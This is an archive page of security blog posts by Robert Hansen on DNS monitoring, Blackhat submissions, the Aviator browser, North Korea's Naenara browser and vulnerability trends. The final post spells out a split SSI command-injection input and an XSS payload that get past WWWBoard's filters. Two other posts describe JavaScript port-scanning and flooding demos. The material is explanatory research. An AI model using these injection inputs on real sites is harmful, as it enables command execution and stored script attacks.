Author Archives: Robert Hansen

About Robert Hansen

Robert Hansen is the Vice President of WhiteHat Labs at WhiteHat Security. He's the former Chief Executive of SecTheory and Falling Rock Networks which focused on building a hardened OS. Mr. Hansen began his career in banner click fraud detection at ValueClick. Mr. Hansen has worked for Cable & Wireless doing managed security services, and eBay as a Sr. Global Product Manager of Trust and Safety. Mr. Hansen contributes to and sits on the board of several startup companies. Mr. Hansen has co-authored "XSS Exploits" by Syngress publishing and wrote the eBook, "Detecting Malice." Robert is a member of WASC, APWG, IACSP, ISSA, APWG and contributed to several OWASP projects, including originating the XSS Cheat Sheet. He is also a mentor at TechStars. His passion is breaking web technologies to make them better. Robert can be found on Twitter @RSnake.

dnstest – Monitor Your DNS for Hijacking

In light of the latest round of attacks against and/or hijacking of DNS, it occurred to me that most people really don’t know what to do about it. More importantly, many companies don’t even notice they’ve been attacked until a customer complains. Especially for smaller companies who may not have as many customers, or only accept comments through a website, they may never know unless they randomly check, or the attacker releases the site and the flood of complaints comes rolling in after the fact.

So I wrote a little tool called “dnstest.pl” (yes a Perl script) that can be run out of cron and can monitor one or more hostname-to-IP-address pairs of sites that are critical to you. If anything happens it’ll send you an alert via email. There are other tools that do this or similar things, but it’s another tool in your arsenal; and most importantly dnstest is meant to be very lightweight and simple to use. You can download dnstest here.

Of course this is only the first step. Reacting quickly to the alert simply reduces the outage and the chance of customer complaints or similar damage. If you like it but want it to do something else, go ahead and fork it. Enjoy!

How to Get Accepted at Blackhat

One of the most common things I get asked as part of my Review Board for the Blackhat security conference is, “How do I get my submission accepted?” It’s a fair question and it’s understandable how it would appear to be a total black box. But there are actually a fairly clear set of criteria that the board uses. We aren’t strict about these rules, which can vary from Review Board member to Review Board member. However, this is a pretty good list of things to think about when you’re submitting a talk:

  1. Make sure your content is original. This might seem obvious but it apparently isn’t to the vast majority of people who submit talks to Blackhat. Most of the submissions we receive are actually just re-hashes of other people’s presentations, either blatantly or inadvertently. Quite often people will try to package it as if they were the first ones to find it, even coming up with their own acronyms. This is a pretty sure-fire way to get rejected.
  2. Make sure your content impacts a lot of people. This is also often called the “marketing” requirement. Blackhat needs to get people to care about your presentation. If your wonderfully researched presentation filled with interesting technical detail impacts you and your friend but no-one else in the world, frankly, we applaud you, but we can’t fill a room with a presentation like that. Ideally your research should impact everyone, but think big. If your parents wouldn’t care if they saw the impact of your research on the news, chances are no one else will either.
  3. Make sure you fill out the CFP completely. If you forget to fill fields out, we will reject you. So don’t leave anything blank.
  4. Make sure you fill out the CFP correctly. Your outline matters. The tags you use matter. When we ask you why this would be a good presentation don’t tell us because you like Blackhat. We appreciate that, but it’s important for you to actually answer the question. We read everything.
  5. Make us understand what you actually want to present. This might actually require some work on your part. We might be too dumb to grok your genius without some pretty pictures. But the short of it is if we don’t understand what you’re trying to say, we might assume you don’t either. Outlines are important for us to understand the flow of your presentation and see what kind of guidance we might want to give you. Make sure your outlines are as detailed as you can get. Don’t be afraid of writing a lot, we’ll read it.
  6. Respond to the board when they ask questions. If you don’t reply to us, we may have to assume you’ve gone radio silent and aren’t interested in talking anymore. If we ask you a question and you do respond, please respond with as much detail as possible. We often have to get clarity on the vulns you’re sending us to make sure there isn’t overlap with existing research or other people who are presenting. Don’t worry, we keep our mouths shut – we’re all under confidentiality agreements.
  7. Demos, tools and 0days are much beloved. If you have a demo, that’s great. If you’re going to actually release (not just show) a tool, that’s even better. But the best is when you give us 0day. That always draws a crowd! Unfortunately the harsh reality is that offensive research always draws more asses-into-seats than defensive research. However, we are going to start having a defense-only track just for people who are interested in it. But if you say you’re giving us an 0day and then tell us that you told the company and it’s now been fixed, that’s not exactly an 0day now is it? Call it what it is, a non-issue for anyone who has patched.
  8. Make sure you speak the language, or get a translator. We definitely want people from all over the world to come and present. But please make sure that you are fluent in the language, and feel confident you can deliver your presentation without reaching for the words. Worst case, we’ll get you a translator, but we need you to tell us that you need one.
  9. Make it technical. Technical presentations are the cornerstone of Blackhat. If you aren’t technical, you’ll have to really step up your game to get past that threshold. Keynotes, for instance, don’t have to be technical, and some legal discussions can miss that too. But you really should try to submit a talk that is technical. Don’t underestimate how technical the audience can be. At the same time, you’ll need to explain yourself to those who aren’t as technical. So make sure you understand it well enough to explain it to your audience when they ask questions.
  10. Don’t submit a sales pitch. If you are selling product, great. If you work for a company, great. If you give a presentation about your product features and your client list and pricing, etc… you’ll never speak at Blackhat again. If we get a whiff of you submitting a talk that is a sales pitch, you’ll get rejected. We really really don’t like that. Really.
  11. Don’t spam the review board. Occasionally someone from some big company gets the crazy idea to submit dozens of presentations that are all the same or almost all the same. You spent countless hours doing the research and writing up all of those submissions and we rejected all of them without reading any of them in 10 seconds. Don’t do it.
  12. Don’t ask for 3 hours when you can do it in 15 minutes. This is a tough one because so many presentations could go on forever with all of the issues related to them, but when in doubt go to the shorter time slot. We have more of the shorter slots so you’re more likely to get approved. If we see something is three hours we will do about three times the scrutiny of a one hour submission. It’s a big commitment to give someone a room for three hours, so if you’re going to ask for it you had better be able to back that up with three solid hours of good research.
  13. Be entertaining. Some people are just awesome. They’re charismatic, funny, well spoken, or just have amazing slides. Be that person. It helps.
  14. Don’t mess up! Just because you got accepted to Blackhat doesn’t mean you are instantly a hero. It’s actually probably the hard-swallow followed up by a “Dear lord, what have I just signed myself up for” moment. You now need to spend between 2-4 months to get your research in order. People who don’t put that much time in almost always come across as under-prepared. People who don’t practice their presentation will naturally score lower. The reason you see researchers coming back to do more than one presentation is because they did good research and presented well. If you mess up you’ll probably never be speaking at Blackhat again, or at least not until you up your game. I am proof that Blackhat forgives — I gave a not-so-hot presentation when I was very young — but my advice would be to not mess up in the first place.

Occasionally when I tell people what they need to do, they say things like, “I don’t really have anything that would get past that gauntlet.” To which I have to tell them the hard truth is that we get many hundreds of submissions and reject most of them. Yes, some people are destined to never speak at Blackhat. But there are many other conferences out there for less-technical content.

I’m on several other review boards as well for other conferences, and for the most part these rules all still apply, with the exception of the types of presentations that we’re most interested in. So this is a fairly good rule of thumb for all up-and-coming presenters. We love new presenters. Some of the best presentations I’ve ever seen were by untested new presenters, so don’t think that you have to be a seasoned old-timer to get into Blackhat or really any conference. Just make sure you’re as awesome as you can be! Also, be sure to check out Jer’s thoughts on the same topic for his take on things you should be thinking about.

That said, please submit!

The Imitation Game – A Review

Warning: Spoiler alert!

I went to go watch “The Imitation Game” this weekend, on a bit of a whim. I know Alan Turing’s story rather well – having spent a lot of time in computer security will do that to you. Overall I thought the movie was really good – the acting, writing, and overall historicity were all very good.

Pros:

  • The movie spent a lot of time talking about his personal life, and what lead up to his suicide. I’d argue that this was as much a movie about the father of computers as it was about the historical (and unfortunately current) marginalization and criminalization of homosexuality.
  • I was impressed how the movie explained how reduction of keyspace works in rather plain english and simple examples. The math might be improbably difficult for the average person, but they managed to make it accessible.
  • They mention the Turing test – though thankfully there were no CAPTCHAs in sight.
  • The movie spent quite a long time explaining why you cannot use a single signal to make any decisions or the adversary will switch tactics and you’ll lose that one signal. I try to make this point all the time and yet I still people doing things like blocking countries at the firewall by IP address. If you are in security, and you take nothing away from this movie, let it be this – do not use a single signal to identify and stop fraud/hacking. You’re hurting the ecosystem by doing so. Yes, you.

There were a couple cons though… Some cons that actually made me cringe.

Cons:

  • At one point in the movie Alan Turing made the bear in the woods joke. Just about the time my eyes started rolling the audience burst into laughter – at this point I realized I was extremely jaded and should probably learn to live a little, hug a tree, run like a child or generally do something other than wince at old security jokes. But the reason I hate this joke is that is presumes that you can leave the woods once the bear has eaten your friend. Unless you plan to close up shop and leave the Internet, this analogy has always been a very dangerous one. Bears get stronger, and will get hungry again, and if you’re relying on running faster than an adversary who is dead you’re using the wrong analogy. I prefer the prairie dog analogy if you’re looking for silly analogies.
  • A big motivator throughout the movie was that at the end of the day a buzzer went off that meant that the Nazis had changed their encryption keys. So yesterday’s keys were “useless” and anything they had done had to be scrapped if they couldn’t complete it by midnight. Though it’s an interesting plot device it really doesn’t work that way. Decryption doesn’t stop at the end of the day, just because your key changes. If the adversary has the ciphertext and there is nothing ephemeral about the key, it can still be decrypted. Now if you’re going to make the point that the data loses value the longer it takes to decrypt – yes, I’m on board with that. But the movie didn’t explain that at all.
  • They don’t really talk about Turing’s other accomplishments, like the Turing Halting problem – which more or less describes the problem with blacklists and all kinds of other technologies. As a student of breaking crappy blacklists, this is one of his most useful accomplishments to my daily life. I really wanted to hear them mention it at least once, like they did with the Turing test. Alas!

I’d also point out that there were some other controversies about the historical accuracy as well that didn’t jump out at me as I watched it. Anyway, it was a really wonderful movie, despite the cons. I’d highly recommend it to people who want to know a bit more about our roots, and get a bit more familiarity with some of the core concepts that have brought us to where we are today. I love that we’re seeing more movies about real heroes and not the typical hollywood-manufactured superhero.

Aviator Open Source (Day 1)

We got some interesting feedback from Google in just the first 24 hours of open sourcing Aviator to the community. Interestingly, one of our initial barometers of success was getting to the point where Google had to talk about us, so today was a milestone for us!

The post makes some interesting points around the architecture of our fixes, pointing out that we are behind Google in patches and the fact that there are software security issues. Let me make it clear, we never claimed to be as fast as Google at releasing updates. In fact, that would be nearly impossible for a company of our size. Google gets the benefit of making in excess of $50 billion-a-year from ads by marketing it’s users to advertisers. Therefore, Google has a lot of vested interest in keeping the browser up to par and capable of delivering more ads to those users. To say we are outmatched is an understatement.

We decided to go open source with Aviator and thereby seek assistance from the community. All this being said, we would like to take a moment to respond to some of the points made in the post as well as respond to the advice that was shared:

  1. Yes, there are bugs in our code, just like there were bugs that we inherited from the Chromium code base.
  2. Yes, it is perhaps not an elegant code base like Google Chrome, however Chrome has bugs as well. That’s the nature of such a complex project. The nice thing about bugs is that they can be fixed.
  3. Advising users to not use Aviator misses the bigger picture. To tell people that if they use Chrome, add Disconnect and change some privacy settings you’ll get the same thing as Aviator is not at all accurate. We have made changes in Aviator that are beyond configuration, such as the browser’s ability to stop referring URLs from being sent cross domain as well as always being in private mode by default. But far more importantly, when we talk to average users it becomes clear that consumers can’t actually do what the post is suggesting. Most people do not know the first thing about Disconnect and therefore, they don’t know what they need to do to add it. Our argument all along has been that consumers need better options by default. They don’t even know what to search for to start learning how to protect themselves.

Our reasoning for making Aviator open source was two-fold:

  1. We wanted to be honest with our users and give them a chance to see that we don’t have anything up our sleeves and that we are not (nor were we ever) hiding anything from them. Going open source is painful, but it is good for project transparency, something Google has long refused to do with Chrome. Chrome is not open source.
  2. We wanted to solve Google’s primary issue with us – the lack of development resources necessary to deliver the browser in a timely manner. That’s absolutely a real issue and we have never claimed otherwise. By making it available to the community, we believe that more time and resources will be put towards continuing to improve it and we are excited to see where the community takes it next.

The core issue in all of this is that we set out to create a browser that would provide security and privacy settings by default. We believe that we made very good strides in that effort and when issues around those settings were brought to our attention, we actively made changes, something that Google has been unwilling to do.

I won’t lie, going open source has been hard and only with the help of the community will Aviator continue to improve. It is now up to the community to decide if they’d rather hand over their privacy when they search using other browsers, or stand behind a project that we believe has the user’s best interests as a primary motivator. Only time will tell.

North Korea’s Naenara Web Browser: It’s Weirder Than We Thought

Naenara Browser is the DPRK’s version of Firefox that comes built into Red Star OS, the official operating system of North Korea. I recently got my hands on Naenara Browser version 3.5. My first impression in playing with it is that this is one ancient version of Firefox. Like maybe more than a half dozen major revisions out of date? It’s hard to tell for sure in cursory checking but the menus remind me of something I used to use 5+ years ago. That’s not too surprising; it’s tough to have a browser and update it all the time, especially with such a small team devoted to the project, as I’m sure they have a lot of other things going on.

When I first saw an image of the browser I was awe-struck to see that it made a request to an adddress (http://10.76.1.11/) upon first run. That may not mean much to someone who doesn’t deal with the Internet much, but it’s a big deal if you want to know how North Korea’s Internet works.

If you want to send a request to a web address across the country, you need to have a hostname or an IP address. Hostnames convert to IP addresses through something called DNS. So if I want to contact www.whitehatsec.com DNS will tell me to go to 63.128.163.3. But there are certain addresses, like those that start in “10.”, “192.168.” and a few others that are reserved and meant only for internal networks – not designed to be routable on the Internet. This is sometimes a security mechanism to allow local machines to talk to one another when you don’t want them to traverse the Internet to do so.

Here’s where things start to go off the rails: what this means is that all of the DPRK’s national network is non-routable IP space. You heard me; they’re treating their entire country like some small to medium business might treat their corporate office. The entire country of North Korea is sitting on one class A network (16,777,216 addresses). I was always under the impression they were just pretending that they owned large blocks of public IP space from a networking perspective, blocking everything and selectively turning on outbound traffic via access control lists. Apparently not!

But it doesn’t stop there! No! No sirrreee… I started digging through their configuration settings and here are some gems:

  1. They use the same tracking system Google uses to create unique keys, except they built their own. That means the microtime of installation is sent to the mothership every single time someone pulls down the anti-phishing and anti-malware lists (from 10.76.1.11) in the browser. This microtime is easily enough information to decloak people, which is presumably the same reason Google built it into the browser.
  2. All crash reports are sent to the mothership (10.76.1.11). So every time the browser fails for some reason they get information about it. Useful for debugging and also for finding exploits in Firefox, without necessarily giving that information back to Mozilla – a U.S. company.
  3. All news feeds go back to the mothership in a specially crafted URL: http://10.76.1.11/naenarabrowser/rss/?url=%s At first it was unclear if that actually does anything or not, since we can’t see the IP address, but it looks like it probably does act as a feed aggregator.
  4. Strangely, the browser adds “.com” instead of “.com.kp” as a suffix when the browser can’t find something. It’s odd because this means in some cases this might accidentally be contacting external hosts when someone typos something in the country. A bad design choice, but perhaps meant for usability since most things live on .com.
  5. There are quite a few references to “.php” on the mothership website. I would be unsurprised if most things on it were written in PHP.
  6. Then I spotted this little number: http://10.76.1.11/naenarabrowser/%LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ This is the warning that pops up when users turn on geolocation. But here’s the really crazy part: if you remove the DPRK specific URL part and just leave it as %LOCALE%.www.mozilla.com/%LOCALE%/firefox/geolocation/ and substitute %LOCALE% with “ko” you end up on Mozilla’s site translated into Korean. Could the mothership be acting as a proxy? Is that how people are actually visiting the Internet – through a big proxy server? Can that really be true? It kind of makes sense to do it that way if you want to allow specific URLs through but not others on the same domain. Hm!
  7. More of the same. This time the safe browsing API that Google supports to find phishing/malware stuff — http://10.76.1.11/naenarabrowser/safebrowsing.clients.google.com/safebrowsing/diagnositc?client=%NAME%&hl=%LOCALE%&site= — if you remove the preceding part of the URL and fill in the variables it’s a real site. And there are a bunch more like this.
  8. Apparently they allow some forms of extensions, plugins and themes, though it’s not clear if this is the whole list or their own special brand of allowed add ons: http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/extensions/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/plugins/ http://10.76.1.11/naenarabrowser/%LOCALE%/%VERSION%/themes/

  9. Apparently all of the mail from the country goes through the single mothership URL. Very strange to build it this way, and obviously vulnerable to man in the middle attacks, sniffing and so on, but I guess no one in DPRK has any secrets, or at least not over email: http://10.76.1.11/naenarabrowser/mail/?To=%s I found a reference to “evolution” with regards to mail, which means there is a good chance North Korea is using the Evolution project for their country.

  10. Same thing with calendaring? So many sensitive things end up in calendars, like passwords, excel spreadsheets, etc… it’s still very odd that they haven’t bothered using HTTPS internally: http://10.76.1.11/naenarabrowser/webcal/?refer=ff&url=%s

  11. This one blew my mind. Either it’s a mistake or a bizarre quirk of the way DPRK’s network works but the wifi URL for GEO still points to https://www.google.com/loc/json – not only is there no way for this to work since Google hasn’t gone through the country with their wifi cars, and it’s on the public Internet without going through their proxy of doom, but also it’s over HTTPS, meaning that if it were able to be contacted, the DPRK might have a hard time seeing what is being sent. Would they allow outbound HTTPS? More questions than answers it seems.
  12. The offical Naenara search function isn’t Google, and it’s not even clear if it’s a proxy or not. But one thing makes me think it might be – it’s in UTF-8 charcode, and not something that you might expect like BIG5 or ISO-2022-KR or SHIFT_JIS or something. http://10.76.1.11/se/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&keyword= But wait a tick, after a little digging I found a partial match on the URL: /search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1 and where did I find this? Google. Are they proxying Google results? I think so! That means that depending on what Google can put on those pages, they technically can run JavaScript and read the DPRK’s email/calendars, etc. using XMLHTTPRequest, since they are all on the same domain. Whoops!

  13. In looking around at the certificates that they support, I was not surprised to find that they accepted no other certificates as valid – only their own. That means it would be trivial to man in the middle any outbound HTTPS connection, so even if they do allow outbound access to Google’s JSON location API it wouldn’t help, because the connection and contents can be monitored by them. Likewise, no other governments can man in the middle any connections that the North Koreans have (I’m saying that with a bit of tongue in cheek, because of course they can according to Wikileaks docs, but this probably makes the DPRK feel better — and more importantly they probably don’t know how to do it in the same way as the NSA does, so they have to rely on draconian Internet breaking concepts like this).

  14. The browser automatically updates, without letting the browser disable that function. That’s actually a good security measure, but given how old this browser is, I doubt they use it often, and therefore it’s probably not designed to protect the user, but rather allow the government to quickly install malware should they feel the need. Wonderful.
  15. Even if the entire Internet is proxied through North Korean servers, and even if their user agent strings are filtered by the proxy, an adversary can still identify a user using Naenara by looking at it in JavaScript space using navigator.UserAgent. Their user agent is, “Mozilla/5.0 (X11; U; Linux i686; ko-KP; rv: 19.1br) Gecko/20130508 Fedora/1.9.1-2.5.rs3.0 NaenaraBrowser/3.5b4″ So if you see that UserAgent string in JavaScript you could target North Korean users rather easily.
  16. Although the Red Star OS does lock down things like their file manager that only shows you a few directories, disables the command-O (open) feature, removes the omnibar feature and so on, it’s still possible to do whatever you want. Using the browser users can go to file:/// to view files and they can write their own JavaScript using javascript: directives which give them just about any access they want, if they know what they’re doing. Chances are they don’t, but despite their Military’s best efforts the Red Star OS actually isn’t that locked down from a determined user’s perspective.
  17. Snort intrusion detection system is installed by default. It’s either used as an actual security mechanism as it was designed or it could be re-purposed as a way to constantly snoop on people’s computers to see what they are doing when they use the Internet. Even if it didn’t phone home necessarily, the DPRK soldier who broke down your door could fairly easily do forensics and see everything you had done without relying on any IP correlation at the mothership. So using your neighbor’s wifi isn’t a safe alternative for a political dissident using Red Star OS.

My ability to read North Korean is non-existent, so I had to muddle my way through this quite a bit, but I think we have some very good clues as to how this browser and more importantly how North Korea’s Internet works, or doesn’t work as it might be.

It is odd that they can do all of this off of one IP address. Perhaps they have some load balancing but ultimately running anything off of one IP address for a whole country is bad for many reasons. DNS is far more resilient, but it also makes things slower, in a country with Internet connectivity that is probably already pretty slow. If I were to guess, the DPRK probably uses a proxy and splits off core functions by URL to various clusters of machines. A single set of F5s could easily handle this job for the entire country. It would be slow, but it doesn’t seem the country cares much about the comforts of fast Internet anyway.

Ultimately the most interesting takeaway for me personally was what lengths North Korea goes to to limit what their people get to do, see and contribute to — Censorship at a browser and network level embodied in the OS called Red Star 3.0. It’s quite a feat of engineering. Creepy and cool. Download the Red Star OS here.

Aviator Going Open Source

One of the most frequent criticisms we’ve heard at WhiteHat Security about Aviator is that it’s not open source. There were a great many reasons why we didn’t start off that way, not the least of which was getting the legal framework in place to allow it, but we also didn’t want our efforts to be distracted by external pressures while we were still slaving away to make the product work at all.

But now that we’ve been running for a little more than a year, we’re ready to turn over the reins to the public. We’re open sourcing Aviator to allow experts to audit the code and also to let industrious developers contribute to it. Yes, we are actually open sourcing the code completely, not just from a visibility perspective.

Why do this? I suspect many people just want to be able to look at the code, and don’t have a need to – or lack the skills to – contribute to it. But we also received some really compelling questions from the people who have an active interest in the Tor community who expressed an interest in using something based on Chromium, and who also know what a huge pain it is to make something work seamlessly. For them, it would be a lot easier to start with a more secure browser that had removed a lot of the Google specific anti-privacy stuff, than to re-invent the wheel. So why not Aviator? Well, after much work with our legal team the limits of licensing are no longer an issue, so now that is now a real possibility. Aviator is now BSD (free as in beer) licensed!

So we hope that people use the browser and make it their own. We won’t be making any additional changes to the browser; Aviator is now entirely community-driven. We’ll still sign the releases, QA them and push them to production, but the code itself will be community-driven. If the community likes Aviator, it will thrive, and now that we have a critical mass of technical users and people who love it, it should be possible for it to survive on its own without much input from WhiteHat.

As an aside, many commercial organizations discontinue support of their products, but they regularly fail to take the step of open sourcing their products. This is how Windows XP dies a slow death in so many enterprises, unpatched, unsupported and dangerously vulnerable. This is how MMORPG video games die or become completely unplayable once the servers are dismantled. We also see SAAS companies discontinue services and allow only a few weeks or months for mass migrations without any easy alternatives in sight. I understand the financial motives behind planned obsolescence, but it’s bad for the ecosystem and bad for the users. This is something the EFF is working to resolve and something I personally feel that all commercial enterprises should do for their users.

If you have any questions or concerns about Aviator, we’d love to hear from you. Hopefully this is the browser “dream come true” that so many people have been asking for, for so long. Thank you all for supporting the project and we hope you have fun with the code. Aviator’s source code can be found here on Github. You don’t need anything to check it out. If you want to commit to it, shoot me an email with your github account name and we’ll hook you up. Go forth! Aviator is yours!

#HackerKast 14 Bonus Round: Canadian Beacon – JavaScript Beacon and Performance APIs

In this week’s bonus footage of HackerKast, I showed Matt my new JavaScript
port scanning magic that I dubbed “Canadian Beacon” because it uses the new Beacon API. It was either that or Kevin Beacon – I had to make a tough choice with my puns. It utilizes both the performance API and the beacon API.

It shows how you can use iframes and performance APIs to do basically the same thing we used to be able to do with onload event handlers on iframes of yester-year.

Not a huge deal, because we can do this in a bunch of different ways already, but it shows how easy it is to do JavaScript port scanning; and even if someone bothers to shut one variant down, this and other variants will take their place. This is one of the major reasons Aviator has chosen to break access to RFC1918 from the Internet.

Only a few browser variants are vulnerable, Chrome and apparently Firefox though I only got it working in Chrome. If you want to see a demo you can check out Canadian Beacon here.

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to take a look at their extensive collection of vulnerabilities that they have collected over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid 2000’s. However, one thing I found that struck me as very odd was that we’re starting to see a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are) here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogenous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, people who use it are less likely to switch in favor of something new, which means there are fewer threats to the incumbent code to be replaced, and it’s therefore more likely that new frameworks won’t get adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, therefore obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves far enough where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The presence of more bug bounties, where researchers get paid for disclosing their newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is is an interesting trend and should be watched carefully. It could be a hybrid of a number of these issues as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit that is not expressed in the data above shows that there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code) context-dependent attacks (e.g. tricking a user to click a malicious link) are still a leading source of compromise at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common or even more so than they have ever been. Said another way, compromises are flat or even up, and new remotely exploitable web application vulnerabilities being disclosed is down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.